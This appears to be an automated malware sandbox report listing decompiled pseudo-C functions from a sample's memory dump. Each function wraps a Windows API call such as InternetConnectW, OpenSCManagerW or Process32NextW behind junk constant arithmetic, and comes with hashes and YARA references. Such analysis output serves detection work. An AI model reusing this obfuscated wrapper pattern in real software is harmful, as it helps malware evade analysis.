Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: FullImageNameProcessQuery
String ID: NCS
API String ID: 3578328331-2027213022
Opcode ID: 58d91c8cd641c62f5ac2f346171b33f0bdd7e64fc3e4531675e72775a6623268
Instruction ID: d655dc8baf1646b4ac18e160483bcd1c2542efc6e77c7d456345f5e021db4f02
Opcode Fuzzy Hash: 58d91c8cd641c62f5ac2f346171b33f0bdd7e64fc3e4531675e72775a6623268
Instruction Fuzzy Hash: 9821E775D0121DEFDB19DFD4D84AAEEBFB5FB44304F108099E910AA290D3B16B619F90

Uniqueness

Uniqueness Score: -1.00%

Function 0419235F, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
networkCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0419235F(void* __ecx, void* __edx, void* _a8, signed int _a16, intOrPtr _a20, intOrPtr _a28, intOrPtr _a32, WCHAR* _a36, intOrPtr _a40, intOrPtr _a44, long _a48) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t52;
				short _t56;

				_push(_a48);
				_t56 = _a16;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(_a20);
				_push(_t56 & 0x0000ffff);
				_push(0);
				_push(_a8);
				_push(0);
				_push(0);
				E0417DD01(_t56 & 0x0000ffff);
				_v16 = 0x8cd738;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x35c67109;
				_v8 = 0x68c6d8;
				_v8 = _v8 >> 9;
				_v8 = _v8 + 0x2fa8;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000f0fb5;
				_a16 = 0x2860ce;
				_a16 = _a16 | 0xd611e6f4;
				_a16 = _a16 ^ 0x811be872;
				_a16 = _a16 ^ 0x7f5a7ef1;
				_a16 = _a16 ^ 0x287e19fc;
				_v12 = 0x5a55d;
				_v12 = _v12 << 0xb;
				_v12 = _v12 ^ 0x2d213fe2;
				E0418CDA7(0xaf, __ecx, 0x2d8c49fa, __ecx, 0x1bd2a6f0);
				_t52 = InternetConnectW(_a8, _a36, _t56, 0, 0, _a48, 0, 0); // executed
				return _t52;
			}

0x04192367
0x0419236a
0x0419236f
0x04192375
0x04192378
0x0419237b
0x0419237e
0x04192381
0x04192382
0x04192385
0x04192386
0x04192387
0x0419238a
0x0419238c
0x0419238d
0x04192392
0x0419239c
0x041923a0
0x041923a7
0x041923ae
0x041923b2
0x041923b9
0x041923bd
0x041923c4
0x041923cb
0x041923d2
0x041923d9
0x041923e0
0x041923e7
0x041923ee
0x041923f2
0x04192416
0x0419242c
0x04192433

APIs

InternetConnectW.WININET(35C67109,?,?,00000000,00000000,?,00000000,00000000), ref: 0419242C

Strings

?!-, xrefs: 041923F2

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: ConnectInternet
String ID: ?!-
API String ID: 3050416762-3442010701
Opcode ID: 6f34e04dd8aa557ab9c1b784f9fd65bf1a8b4d9440e8c6bcbd5d9e6eda74a7b2
Instruction ID: 29b8aa601d6d868c2479dcb677131eab9638b12d1542a5644458f0af21f407a2
Opcode Fuzzy Hash: 6f34e04dd8aa557ab9c1b784f9fd65bf1a8b4d9440e8c6bcbd5d9e6eda74a7b2
Instruction Fuzzy Hash: EE210372801248BBDF05DF95DD09CDF7FB5EB89718F108158F91562220D3719A64EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04185BBD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04185BBD(int __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t50;
				void* _t60;
				signed int _t62;
				int _t66;

				_push(_a16);
				_t66 = __ecx;
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E0417DD01(_t50);
				_v36 = 0x258ca7;
				_v32 = 0xde4b32;
				_v28 = 0;
				_v24 = 0;
				_v16 = 0x4987a5;
				_v16 = _v16 + 0xffff2659;
				_v16 = _v16 ^ 0xa15b328b;
				_v16 = _v16 << 8;
				_v16 = _v16 ^ 0x13968bd2;
				_v12 = 0x36f809;
				_v12 = _v12 << 0x10;
				_v12 = _v12 + 0xffffd316;
				_v12 = _v12 ^ 0x045e6a7e;
				_v12 = _v12 ^ 0xfc5c060e;
				_v20 = 0xa09c13;
				_v20 = _v20 << 0x10;
				_t62 = 0x71;
				_v20 = _v20 / _t62;
				_v20 = _v20 ^ 0x0161c582;
				_v8 = 0xb37cf5;
				_v8 = _v8 * 0x6d;
				_v8 = _v8 + 0x5432;
				_v8 = _v8 << 0xe;
				_v8 = _v8 ^ 0x2225e85c;
				E0418CDA7(0x12b, _t62, 0x4e81e0, _t62, 0x2c7f059a);
				_t60 = OpenSCManagerW(0, 0, _t66); // executed
				return _t60;
			}

0x04185bc5
0x04185bca
0x04185bcc
0x04185bcf
0x04185bd0
0x04185bd3
0x04185bd4
0x04185bd5
0x04185bda
0x04185be4
0x04185bed
0x04185bf0
0x04185bf3
0x04185bfa
0x04185c01
0x04185c08
0x04185c0c
0x04185c13
0x04185c1a
0x04185c1e
0x04185c25
0x04185c2c
0x04185c33
0x04185c3a
0x04185c43
0x04185c4b
0x04185c4e
0x04185c55
0x04185c6c
0x04185c6f
0x04185c76
0x04185c7a
0x04185c8d
0x04185c98
0x04185c9f

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000), ref: 04185C98

Strings

\%", xrefs: 04185C5C

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: ManagerOpen
String ID: \%"
API String ID: 1889721586-3574504365
Opcode ID: 3fbef4973f4342078fa4b93f1cc564c5885af58c7f9d42e642b2f4bcb4feb99b
Instruction ID: aa4aa661b7c9cef7837de7c09bddce1c1b56214a22a3d7f995fb10547e40fb90
Opcode Fuzzy Hash: 3fbef4973f4342078fa4b93f1cc564c5885af58c7f9d42e642b2f4bcb4feb99b
Instruction Fuzzy Hash: A4212471C00219ABEB14DFEADC8989FBBB4FF80304F10819DE42567250D7B55B518F90

Uniqueness

Uniqueness Score: -1.00%

Function 0417B81B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
networkCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0417B81B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, long _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t43;
				void* _t53;
				signed int _t55;

				_push(0);
				_push(0);
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				E0417DD01(_t43);
				_v32 = 0x7ab79;
				_v28 = 0x4072d6;
				_v24 = 0;
				_v20 = 0x259d06;
				_t55 = 0x65;
				_v20 = _v20 * 0x29;
				_v20 = _v20 ^ 0x06081db0;
				_v16 = 0xe53d34;
				_v16 = _v16 ^ 0x22d335d0;
				_v16 = _v16 / _t55;
				_v16 = _v16 ^ 0x0056e956;
				_v8 = 0xc77f19;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 | 0x76f3f5f7;
				_v8 = _v8 ^ 0x76f0214e;
				_v12 = 0x111d2d;
				_v12 = _v12 + 0x8367;
				_v12 = _v12 ^ 0xb462ca39;
				_v12 = _v12 ^ 0xb479992e;
				E0418CDA7(0xc6, _t55, 0x2d8c49fa, _t55, 0x94095012);
				_t53 = InternetOpenW(0, _a20, 0, 0, 0); // executed
				return _t53;
			}

0x0417b824
0x0417b825
0x0417b826
0x0417b827
0x0417b82a
0x0417b82d
0x0417b830
0x0417b831
0x0417b836
0x0417b83b
0x0417b845
0x0417b84e
0x0417b851
0x0417b85e
0x0417b865
0x0417b868
0x0417b86f
0x0417b876
0x0417b887
0x0417b88a
0x0417b891
0x0417b898
0x0417b89c
0x0417b8a3
0x0417b8aa
0x0417b8b1
0x0417b8b8
0x0417b8bf
0x0417b8d8
0x0417b8e7
0x0417b8ed

APIs

InternetOpenW.WININET(00000000,004072D6,00000000,00000000,00000000), ref: 0417B8E7

Strings

VV, xrefs: 0417B88A

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: InternetOpen
String ID: VV
API String ID: 2038078732-3792437505
Opcode ID: 3701801ff6f8dd731e0e05a3f25f20963a1f855e5a89ea344cf6c754df198f24
Instruction ID: f69525019e64119304837c9efdc5c8166586d5a635141ee567329098b081eb30
Opcode Fuzzy Hash: 3701801ff6f8dd731e0e05a3f25f20963a1f855e5a89ea344cf6c754df198f24
Instruction Fuzzy Hash: 8C212371C02219BBDB18DFAADD4A8EFBFB4FF45354F108188A818A6210D3B15A50DFE1

Uniqueness

Uniqueness Score: -1.00%

Function 041927A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E041927A0(void* __ecx, void* __edx, intOrPtr _a4, struct tagPROCESSENTRY32W _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t48;
				int _t57;
				signed int _t59;
				void* _t63;

				_push(_a16);
				_t63 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0417DD01(_t48);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x6348c0;
				_v28 = 0x8151ea;
				_v20 = 0x339b7c;
				_t59 = 0x56;
				_v20 = _v20 / _t59;
				_v20 = _v20 + 0xffff2a2a;
				_v20 = _v20 ^ 0xfffe9390;
				_v16 = 0x574045;
				_v16 = _v16 >> 2;
				_v16 = _v16 + 0xffff1d9a;
				_v16 = _v16 ^ 0x0010722e;
				_v12 = 0xdc41fa;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 ^ 0x90a01f46;
				_v12 = _v12 ^ 0x90a2b24f;
				_v8 = 0xf67b55;
				_v8 = _v8 + 0xffff117a;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x01ea2a94;
				E0418CDA7(0xe0, _t59, 0xbd10ff8e, _t59, 0x93374628);
				_t57 = Process32NextW(_t63, _a8); // executed
				return _t57;
			}

0x041927a7
0x041927aa
0x041927ac
0x041927af
0x041927b2
0x041927b6
0x041927b7
0x041927bc
0x041927c3
0x041927cc
0x041927d3
0x041927df
0x041927e7
0x041927ea
0x041927f1
0x041927f8
0x041927ff
0x04192803
0x0419280a
0x04192811
0x04192818
0x0419281c
0x04192823
0x0419282a
0x04192831
0x04192838
0x0419283c
0x04192840
0x0419285f
0x0419286b
0x04192871

APIs

Process32NextW.KERNEL32(00F44DD6,0010722E,?,?,?,?,?,?,?,?,?,?,00F44DD6), ref: 0419286B

Strings

E@W, xrefs: 041927F8

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: NextProcess32
String ID: E@W
API String ID: 1850201408-2355502443
Opcode ID: 7ee15bc9203f2b4b78126a0766736a687f2db34cd0d578e3e30cefaa9808e0cf
Instruction ID: 975a7cc9334c26d1e87e023a84bd67b4da1a756a953292af460799a15cd4c675
Opcode Fuzzy Hash: 7ee15bc9203f2b4b78126a0766736a687f2db34cd0d578e3e30cefaa9808e0cf
Instruction Fuzzy Hash: 35213372C0020DBFDB15DFE9D84A9EEBBB5FF14314F108188E920A6251E3B45B159F90

Uniqueness

Uniqueness Score: -1.00%

Function 041926DB, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E041926DB(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t44;
				int _t54;
				signed int _t56;
				void* _t60;

				_push(_a4);
				_t60 = __ecx;
				_push(__ecx);
				E0417DD01(_t44);
				_v16 = 0x77ef37;
				_v16 = _v16 + 0xffffc20a;
				_v16 = _v16 ^ 0x08905bff;
				_v16 = _v16 << 0xc;
				_v16 = _v16 ^ 0x7eacd228;
				_v12 = 0x31db38;
				_v12 = _v12 << 2;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0xffff6686;
				_v12 = _v12 ^ 0xc7642e0b;
				_v8 = 0x3d88e2;
				_v8 = _v8 | 0x05dff782;
				_t56 = 0x3a;
				_v8 = _v8 * 0x7b;
				_v8 = _v8 + 0x65f1;
				_v8 = _v8 ^ 0xe205ba56;
				_v20 = 0xcce255;
				_v20 = _v20 / _t56;
				_v20 = _v20 + 0xffff40ce;
				_v20 = _v20 ^ 0x000a18c2;
				E0418CDA7(0x95, _t56, 0xbd10ff8e, _t56, 0x51b0cde);
				_t54 = FindCloseChangeNotification(_t60); // executed
				return _t54;
			}

0x041926e2
0x041926e5
0x041926e8
0x041926e9
0x041926ee
0x041926f8
0x04192701
0x04192708
0x0419270c
0x04192713
0x0419271a
0x0419271e
0x04192722
0x04192729
0x04192730
0x04192737
0x04192744
0x0419274b
0x0419274e
0x04192755
0x0419275c
0x0419276d
0x04192770
0x04192777
0x04192790
0x04192799
0x0419279f

APIs

FindCloseChangeNotification.KERNEL32(03F175C7,?,?,?,?,?,?,?,00000000), ref: 04192799

Strings

7w, xrefs: 041926EE

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID: 7w
API String ID: 2591292051-171397026
Opcode ID: 6e1dc2c191aec4beff13919356c777487a7afe485657b76ce9c784418bbe82de
Instruction ID: 6ee88bba71d096605692b9d86c82e82a488bee1bfe00ed6579ec8b8aa8236506
Opcode Fuzzy Hash: 6e1dc2c191aec4beff13919356c777487a7afe485657b76ce9c784418bbe82de
Instruction Fuzzy Hash: 6D1142B5D01319EFDB14DFE8D94A8DEBBB4FF04314F208598E421A6280D7B86B059F94

Uniqueness

Uniqueness Score: -1.00%

Function 0418510C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
networkCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0418510C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t38;
				int _t48;
				signed int _t50;
				void* _t54;

				_push(_a12);
				_t54 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0417DD01(_t38);
				_v12 = 0x968686;
				_v12 = _v12 | 0x6b921e35;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x0039f42f;
				_v20 = 0x226e87;
				_v20 = _v20 >> 9;
				_v20 = _v20 ^ 0x0001cfe4;
				_v8 = 0xcecbb8;
				_t50 = 0x22;
				_v8 = _v8 / _t50;
				_v8 = _v8 * 0x2d;
				_v8 = _v8 + 0x2c28;
				_v8 = _v8 ^ 0x0112f96f;
				_v16 = 0x35ff7b;
				_v16 = _v16 + 0xffffc201;
				_v16 = _v16 ^ 0x003b0691;
				E0418CDA7(0x20b, _t50, 0x2d8c49fa, _t50, 0x3a64e8c1);
				_t48 = InternetCloseHandle(_t54); // executed
				return _t48;
			}

0x04185113
0x04185116
0x04185118
0x0418511b
0x0418511f
0x04185120
0x04185125
0x0418512f
0x04185138
0x0418513c
0x04185143
0x0418514a
0x0418514e
0x04185155
0x04185161
0x04185169
0x0418517c
0x0418517f
0x04185186
0x0418518d
0x04185194
0x0418519b
0x041851ae
0x041851b7
0x041851bd

APIs

InternetCloseHandle.WININET ref: 041851B7

Strings

(,, xrefs: 0418517F

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseHandleInternet
String ID: (,
API String ID: 1081599783-777834678
Opcode ID: bba82877cff34884627438d8ae95c7b750cd205710496626b75861ad467e84a6
Instruction ID: 9ef0c0fcf996e92a64bc1e2423e70771cb32942a1468d1a9f91d86d56de53dd5
Opcode Fuzzy Hash: bba82877cff34884627438d8ae95c7b750cd205710496626b75861ad467e84a6
Instruction Fuzzy Hash: BA1116B5D00218FFDF09DFD4D84A8DEBBB4EB05318F108199E914A6250E3B16B259B90

Uniqueness

Uniqueness Score: -1.00%

Function 04185F99, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E04185F99(void* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t39;
				char _t48;
				void* _t50;

				_push(_a12);
				_t50 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E0417DD01(_t39);
				_v12 = 0x425e86;
				_v12 = _v12 << 0x10;
				_v12 = _v12 | 0xbc33d5e6;
				_v12 = _v12 ^ 0xc7d4fb95;
				_v12 = _v12 ^ 0x3963965b;
				_v8 = 0xdc93d9;
				_v8 = _v8 * 0x15;
				_v8 = _v8 | 0x6e8ebc03;
				_v8 = _v8 * 0x2f;
				_v8 = _v8 ^ 0x3f25ac88;
				_v16 = 0xe7676f;
				_v16 = _v16 + 0xfffff3f5;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x1ce6200d;
				_v20 = 0x50ff87;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x000f14e2;
				E0418CDA7(0x32a, __ecx, 0xbd10ff8e, __ecx, 0x75d5dc06);
				_t48 = RtlFreeHeap(_a8, 0, _t50); // executed
				return _t48;
			}

0x04185fa0
0x04185fa3
0x04185fa5
0x04185fa8
0x04185fab
0x04185fad
0x04185fae
0x04185fb3
0x04185fbd
0x04185fc1
0x04185fc8
0x04185fcf
0x04185fd6
0x04185fed
0x04185ff0
0x04186000
0x04186003
0x0418600a
0x04186011
0x04186018
0x0418601c
0x04186023
0x0418602a
0x0418602e
0x04186041
0x0418604f
0x04186055

APIs

RtlFreeHeap.NTDLL(1CE6200D,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0418604F

Strings

og, xrefs: 0418600A

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID: og
API String ID: 3298025750-260190944
Opcode ID: e95d0c9f691aea81f72606eb1b819730adb5d3d191da8ef60acdd916218b4b8e
Instruction ID: 084cdbefaf7a65eb8e5e37ffb19cac7d27ee7b7252058e7b58e564a85f6a0a7b
Opcode Fuzzy Hash: e95d0c9f691aea81f72606eb1b819730adb5d3d191da8ef60acdd916218b4b8e
Instruction Fuzzy Hash: A4111471C0120DFBDB14EFA4D94A9DEBFB4FB04354F608199E425AB260D3B15B009FA1

Uniqueness

Uniqueness Score: -1.00%

Function 04171CF0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E04171CF0(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t42;
				int _t51;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0417DD01(_t42);
				_v20 = 0x708c7;
				_v20 = _v20 + 0xa500;
				_v20 = _v20 + 0x75d;
				_v20 = _v20 ^ 0x000b8fe3;
				_v16 = 0x601dd1;
				_v16 = _v16 | 0xf5b172ad;
				_v16 = _v16 ^ 0x38aadbf2;
				_v16 = _v16 | 0xc4b5f63e;
				_v16 = _v16 ^ 0xcdf41f53;
				_v12 = 0x7a8901;
				_v12 = _v12 + 0xffffcc3d;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x5155d869;
				_v12 = _v12 ^ 0x2b078641;
				_v8 = 0x1b60a6;
				_v8 = _v8 * 0x5b;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x000a52e3;
				E0418CDA7(0x3db, __ecx, 0xbd10ff8e, __ecx, 0xf7b15fc1);
				_t51 = FindClose(_a4); // executed
				return _t51;
			}

0x04171cf6
0x04171cf9
0x04171cfd
0x04171cfe
0x04171d03
0x04171d0d
0x04171d14
0x04171d1b
0x04171d22
0x04171d29
0x04171d30
0x04171d37
0x04171d3e
0x04171d45
0x04171d4c
0x04171d53
0x04171d57
0x04171d5e
0x04171d65
0x04171d7c
0x04171d85
0x04171d89
0x04171da1
0x04171dac
0x04171db1

APIs

FindClose.KERNEL32(2B078641), ref: 04171DAC

Strings

R, xrefs: 04171D6C

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseFind
String ID: R
API String ID: 1863332320-2355708500
Opcode ID: a52345bcea77d94dce6631cf56e705e0793a547c541fcbc84e64da99377a980f
Instruction ID: c5fcb4c6bbad9abe845f9a29ee878bdb50d4391c79c74d05e3719728f75ab9f8
Opcode Fuzzy Hash: a52345bcea77d94dce6631cf56e705e0793a547c541fcbc84e64da99377a980f
Instruction Fuzzy Hash: 1511E2B1D0420CEFDB44EFA8D94A99EBFB0FF04308F10C188E824A6261D3B56B159F91

Uniqueness

Uniqueness Score: -1.00%

Function 041756E8, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 54
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E041756E8(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t51;
				int _t60;
				signed int _t62;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0417DD01(_t51);
				_v24 = _v24 & 0x00000000;
				_v32 = 0xd9c80a;
				_v28 = 0xb7f6b0;
				_v16 = 0x7105db;
				_v16 = _v16 + 0xffff830b;
				_v16 = _v16 + 0xc4b8;
				_v16 = _v16 | 0x9182befb;
				_v16 = _v16 ^ 0x91f535f3;
				_v12 = 0x57e3ed;
				_v12 = _v12 | 0x44bc7d70;
				_v12 = _v12 ^ 0xbd9f04b5;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x01f948ad;
				_v20 = 0x651f43;
				_v20 = _v20 | 0xac6aa396;
				_v20 = _v20 ^ 0xac61bd64;
				_v8 = 0xe3ccd1;
				_v8 = _v8 ^ 0xf2e8fa35;
				_v8 = _v8 ^ 0xaa4c870b;
				_t62 = 0x3c;
				_v8 = _v8 / _t62;
				_v8 = _v8 ^ 0x017f2f06;
				E0418CDA7(0x220, _t62, 0xbd10ff8e, _t62, 0x9839abd1);
				_t60 = lstrcmpiW(_a12, _a4); // executed
				return _t60;
			}

0x041756ee
0x041756f1
0x041756f4
0x041756f7
0x041756fc
0x04175701
0x04175708
0x04175711
0x04175718
0x0417571f
0x04175726
0x0417572d
0x04175734
0x0417573b
0x04175742
0x04175749
0x04175750
0x04175754
0x0417575b
0x04175762
0x04175769
0x04175770
0x04175777
0x0417577e
0x0417578a
0x04175792
0x04175795
0x041757b4
0x041757c2
0x041757c7

APIs

lstrcmpiW.KERNEL32(AC61BD64,01F948AD), ref: 041757C2

Strings

W, xrefs: 0417573B

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcmpi
String ID: W
API String ID: 1586166983-2402654308
Opcode ID: 7fe8527dd198de4a5eb106a73081553d919630e26445ef576918f4fc94d960a4
Instruction ID: 4fe626c252bb8e35c81fe8a3abd23a998a684de6e47e112b3af1295bcc8cdf0c
Opcode Fuzzy Hash: 7fe8527dd198de4a5eb106a73081553d919630e26445ef576918f4fc94d960a4
Instruction Fuzzy Hash: 6021E4B6C11209FBDF45DFE4C94A89EBFB5FB04304F108188E525A6260D3B59B54AF90

Uniqueness

Uniqueness Score: -1.00%

Function 04182445, Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E04182445(DWORD* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a36, WCHAR* _a40, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				int _t56;
				signed int _t58;
				DWORD* _t62;

				_push(_a48);
				_t62 = __ecx;
				_push(0);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E0417DD01(_t47);
				_v12 = 0x33b973;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0x25bf;
				_v12 = _v12 ^ 0xa431bbd9;
				_v12 = _v12 ^ 0xa43bb282;
				_v16 = 0xe5eacf;
				_v16 = _v16 + 0x6bb;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x1cbc085a;
				_v8 = 0x6b2bb4;
				_v8 = _v8 >> 0xb;
				_t58 = 6;
				_v8 = _v8 / _t58;
				_v8 = _v8 + 0x4918;
				_v8 = _v8 ^ 0x000d391d;
				_v20 = 0xd210fb;
				_v20 = _v20 + 0x8b68;
				_v20 = _v20 ^ 0x00dd4109;
				E0418CDA7(0x322, _t58, 0xbd10ff8e, _t58, 0xdb21e405);
				_t56 = GetVolumeInformationW(_a40, 0, 0, _t62, 0, 0, 0, 0); // executed
				return _t56;
			}

0x0418244d
0x04182452
0x04182454
0x04182455
0x04182458
0x0418245b
0x0418245c
0x0418245d
0x04182460
0x04182461
0x04182464
0x04182467
0x04182468
0x0418246b
0x0418246c
0x0418246d
0x04182472
0x0418247c
0x04182482
0x04182489
0x04182490
0x04182497
0x0418249e
0x041824a5
0x041824a9
0x041824b0
0x041824b7
0x041824c0
0x041824c8
0x041824cb
0x041824d2
0x041824d9
0x041824e0
0x041824e7
0x04182506
0x04182518
0x0418251f

APIs

GetVolumeInformationW.KERNEL32(?,00000000,00000000,000483F8,00000000,00000000,00000000,00000000), ref: 04182518

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 585092bb9c513b545628ca758adfb313ba0f56e5cbc9e9bfb7234016f9053718
Instruction ID: 0d3dd588d10ef90aa6b47a8dee677da2022b2adaf4db44bc8a44f3d29ed147ab
Opcode Fuzzy Hash: 585092bb9c513b545628ca758adfb313ba0f56e5cbc9e9bfb7234016f9053718
Instruction Fuzzy Hash: AD213272D01248BBDB259F96CC4ACCFBFB9EB86718F108188F91462210D3B55B25DBA0

Uniqueness

Uniqueness Score: -1.00%

